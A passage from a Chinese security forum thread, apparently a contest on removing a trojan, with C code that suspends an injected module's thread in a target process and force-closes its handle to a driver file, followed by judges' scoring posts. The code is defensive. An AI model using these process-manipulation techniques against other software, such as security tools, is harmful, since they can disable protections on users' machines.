            StartAddress = *(LPDWORD)(offset+0xB8+i*0x40+0x1C);
            if (StartAddress>HBBase && StartAddress<(HBBase+HBSize))
            {
                dwTid = *(LPDWORD)(offset+0xB8+i*0x40+0x24);
                break ;
            }
        }
        break ;
    }
    VirtualFree(buf, 0, MEM_RELEASE);
    if (dwTid == 0)
    {
        CloseHandle(hProcess);
        return -7;
    }
 
    HANDLE  hThread;
    DWORD   OpenThread;
    hThread = NULL;
    OpenThread = (DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"), "OpenThread");
    __asm
    {
        push dwTid
        push 0
        push THREAD_ALL_ACCESS
        call OpenThread
        mov hThread, eax
    }
    if (hThread == NULL)
    {
        CloseHandle(hProcess);
        return -8;
    }
    SuspendThread(hThread);
    CloseHandle(hThread);
 
    //枚举句柄
    HANDLE  hHandle;
    HANDLE  hFile;
    IO_STATUS_BLOCK io;
    LPBYTE  FileName;
    wchar_t *wname;
    buf = NULL;
    dwSize = 0x2000;
    do
    {
        dwSize *= 2;
        if (buf)
        {
            VirtualFree(buf, 0, MEM_RELEASE);
        }
        buf = (LPBYTE)VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
        Status = ZwQuerySystemInformation(16, buf, dwSize, NULL);
    } while (Status == 0xC0000004);
 
    FileName = (LPBYTE)VirtualAlloc(NULL, 0x1000, MEM_COMMIT, PAGE_READWRITE);
    for (i=0; i<*(LPDWORD)buf; i++)
    {
        if (*(LPDWORD)(buf+4+i*0x10+0x00) != dwPid)
            continue ;
        hHandle = 0;
        hHandle = (HANDLE)*(LPWORD)(buf+4+i*0x10+0x06);
        if (*(LPBYTE)(buf+4+i*0x10+0x04) == 0x1C)
        {
            hFile = INVALID_HANDLE_VALUE;
            DuplicateHandle(hProcess, hHandle, GetCurrentProcess(), &hFile, 0, FALSE, DUPLICATE_SAME_ACCESS);
            if (hFile == INVALID_HANDLE_VALUE)
                continue ;
            memset(FileName, 0, 0x1000);
            Status = ZwQueryInformationFile(hFile, &io, FileName, 0x1000, 9);
            if (Status == 0)
            {
                wname = wcsrchr((wchar_t *)(FileName+4), L'\\');
                if (wname != NULL)
                {
                    wname++;
                    if (wcsicmp(wname, L"HBkernel32.sys") == 0)
                    {
                        CloseHandle(hFile);
                        hFile = INVALID_HANDLE_VALUE;
                        DuplicateHandle(hProcess, hHandle, GetCurrentProcess(), &hFile, 0, FALSE, DUPLICATE_SAME_ACCESS | DUPLICATE_CLOSE_SOURCE);
                        if (hFile != INVALID_HANDLE_VALUE)
                        {
                            CloseHandle(hFile);
                            VirtualFree(FileName, 0, MEM_RELEASE);
                            VirtualFree(buf, 0, MEM_RELEASE);
                            CloseHandle(hProcess);
                            return 1;
                        }
                    }
                }
            }
            CloseHandle(hFile);
            hFile = INVALID_HANDLE_VALUE;
        }
    }
 
    VirtualFree(FileName, 0, MEM_RELEASE);
    VirtualFree(buf, 0, MEM_RELEASE);
    CloseHandle(hProcess);
 
    return 0;
}
上传的附件:
2008-10-30 10:42
0
shoooo
雪    币: 398
活跃值: (343)
能力值: (RANK:650 )
在线值:
发帖
回帖
粉丝
私信
6
shoooo 第三轮得分
方法: 2种
基础方法 ring3: 90分
ring3方法不需要重启: +10分
ring0方法: +10分
ring0方法不需要重启 +10分
文档的质量和代码规范性 + 4分

总得分 124分
2008-10-30 11:51
0
kangaroo
雪    币: 264
活跃值: (30)
能力值: ( LV12,RANK:250 )
在线值:
发帖
回帖
粉丝
私信
7
计算的相当完美,争取得满分
2008-10-30 23:22
0
kangaroo
雪    币: 264
活跃值: (30)
能力值: ( LV12,RANK:250 )
在线值:
发帖
回帖
粉丝
私信
8
基础方法 ring3: 90分
ring3方法不需要重启: +5分(驱动还在内存中)
ring0方法: +10分
ring0方法不需要重启 +5分(驱动还在内存中)
文档的质量和代码规范性 + 10分

总得分 120分
2008-11-11 22:56
0
shoooo
雪    币: 398
活跃值: (343)
能力值: (RANK:650 )
在线值:
发帖
回帖
粉丝
私信
9
楼上裁判
文档中说删除驱动文件,删除注册表,删除木马exe,dll是+10 分吧,并没有说 "驱动还在内存中只得5分"
2008-11-12 19:34
0
kangaroo
雪    币: 264
活跃值: (30)
能力值: ( LV12,RANK:250 )
在线值:
发帖
回帖
粉丝
私信
10
4、如果不需要重起的情况下,能完美删除驱动等释放文件,卸载驱动及dll模块,删除注册表,在上面的基础上,再加10分,加满150分为止;其余对重起没有要求。

有个卸载驱动!!!!
2008-11-12 19:40
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回

账号登录
验证码登录

忘记密码?
没有账号?立即免费注册
我已同意 《看雪服务条款》 《看雪课程免责声明》 《看雪隐私政策》